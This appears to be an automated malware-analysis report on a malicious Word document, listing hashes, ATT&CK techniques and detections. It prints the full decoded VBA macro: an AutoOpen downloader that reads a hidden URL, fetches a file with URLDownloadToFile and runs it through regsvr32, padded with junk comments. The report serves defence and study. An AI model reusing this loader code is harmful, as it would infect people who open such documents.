Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2446e5fa5a412550…

MALICIOUS

Office (OOXML)

Size: 116.4 KB. Created: 2020-07-20 09:11:00 UTC. Authoring application: Microsoft Office Word 16.0000. First seen: 2020-09-15
MD5: dd7a6a25fb862a6e16002cda7cd7fbd8
SHA-1: ae565ba4ba3019f8c16b1be79a2d39c2f2dae184
SHA-256: 2446e5fa5a412550fa02b22076d8bac917d219d027fa867fc60a053133288602
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The 'autoopen' subroutine is triggered upon opening, which then calls a 'download' function (not fully shown) with a URL and filename 'c2.pdf'. Subsequently, it executes the downloaded file using the Shell() command. This indicates a downloader functionality, aiming to fetch and run a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.GreenBox5-9139204-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
  • VBA project inside OOXML (medium, OOXML_VBA; 3 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    ' Sandwich chancellor epa lassitude reference
    Shell wu & bn & "32 c2.pdf"
    End Sub
  • URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
    Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
    #Else
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex — Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cex — Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid — Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — Referenced by macro

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3875 bytes
SHA-256: 0588ff700fd7219be98e79cf721c72f7b538f0e6a1f59213a3676365f6ede2b4
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nb"
Function q2(D)
    
' Maori montreal oakland render
' Reindeer engaged
' Concur
' Individually qualifying

' Efficiently moat superlative downloaded
' Displaying forearm ap magazine funeral
' Neigh
' Controllers largely truant
' Who repentant tepid thirty-one

' Ll
' Muff phases boxer functional
' Film conventions legate insidiously robot shanty

' Magic

' Mimic yours
' Weakening packet beverage guarantees brandon disturbed go-between knob

' Chosen up related
' Delegation key
' Proletariat query veterans collectors
' Legend ron souls
End Function
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text

' Horny sealed
' Vodka evaluating

' Mesquite good tutelary
' Receiver
' Lisa
frm.download n, "c2.pdf"

' Corporations obtrude pm crispin
' Firewood fiction variance deg systematically
' Norwegian ratification
' Ebook storm liabilities

' Supplier consisting affront
' Tumults earthenware
' Countryside sm compression parochial edgar
' Largesse islamic
' Enterprises navel camcorder
' Larva cruiser

' Shop expiring hygiene
' Catholic barrage squash disdainful devices
' Readily
' Grandparents stylish
' Monogram creased

' Nice estuary abbreviations bookmarks
' Sandwich chancellor epa lassitude reference
Shell wu & bn & "32 c2.pdf"
End Sub

Attribute VB_Name = "nb1"
Sub e4()

' Propose
' Bali articulate
' Piedmontese follower madonna hoary

' Degenerate
' Number candidacy
' Added examiner
' Resentful thehun interrogate toilette
' Heart-rending weekends
' Harmonize ambien

' Sake africa
' Applaud proportional bali
' Brabant
' Wayne
' Ideas lige

' Prix themselves dimmer
' Begrudge conceptual killed regional

' Suggestions halfway edge
' Stepdaughter dunbar adelaide addition
' Sawn moat rain blocks

' Ventures assembled
' Overdone lenses
' Hypocritical cherry
' Enterprise
' Necklace contumely invitations everyone laconic

' Responsibilities katrina adventure incentive
' Oreilly puzzle treasury placard guano electron
' Emails gratis bestial

' Serious
' Partridge menagerie collector charts traditionary
' Guards emit starting glen
' Maidenhead recipe
' Saucer childbirth subaltern

' Mole integration
' Immorality unreliable recipients

' St allows else eileen
' Db bird died

' Scapegoat essay pj wordy
' Herbs freshmen
' Indebtedness asthma
' Supercilious thaw athletics overcome hunter
' Merge xp

' Discontinued dionysius
' Louse locomotive mastiff crown singer
' Excommunication furtive
End Sub

Attribute VB_Name = "e"
Public Const wu As String = "reg"
Public Const bn As String = "svr"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal Iy As Long, ByVal jh As String, ByVal lq As String, ByVal R As Long, ByVal H As Long) As Long
#End If

Attribute VB_Name = "frm"
Attribute VB_Base = "0{6B8018BF-9C83-4DBE-B9EB-D31245ABD666}{86009E6C-7117-4726-AED7-DEA04D3B7763}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
    URLDownloadToFile 0, url, file, 0, 0
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27136 bytes
SHA-256: 5980f6b57acd5a407f0bf444bb9caee1923ea97e8b22c72701b419e017280e6e